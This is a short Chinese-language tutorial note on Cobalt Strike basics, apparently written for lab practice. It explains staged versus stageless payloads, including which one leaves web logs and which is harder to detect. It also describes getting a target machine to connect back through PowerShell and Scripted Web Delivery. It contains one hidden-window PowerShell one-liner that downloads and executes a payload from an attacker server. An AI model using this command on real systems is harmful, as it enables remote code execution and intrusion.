Cobalt Strike基础

Staged（有阶段）

在有阶段的执行方式中，分为Stager和Stage两个阶段

Stager（初始执行载荷）：

定义：Stager是Stage 1，是一个较小的、轻量级的初始执行载荷

作用：与服务端建立初始连接，并从服务器下载更大的Payload，也就是Stage2

Stage（更大、完整的执行载荷）：

定义：Stage是Stage 2，是一个更大、更完整的执行载荷。

作用：一旦Stager与服务端建立连接，Stager会请求下载Stage

Staged上线会有web日志

Stageless（无阶段）

整个Payload在一次性过程中直接执行，跟服务端交互少，更难被检测，但也会限制Payload的大小，因为只能在一次连接中传输

stageless上线没有web日志

两者大小也不一样，前者是Staged，后者是Stageless

powershell command上线

选择对应的监听器，选择PowerShell Command命令

复制payload，到靶机中

执行powershell命令

成功上线

Scripted Web Delivery （S）上线

配置路径，端口，监听器

点击运行

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.128:8086/abc'))"

本质也是通过powershell远程加载上线，只是这次是攻击者在cs服务器开启了一个web站点，然后靶机中运行命令去请求该站点，响应的内容作为powershell要执行的命令，属于payload远程加载执行的一种方式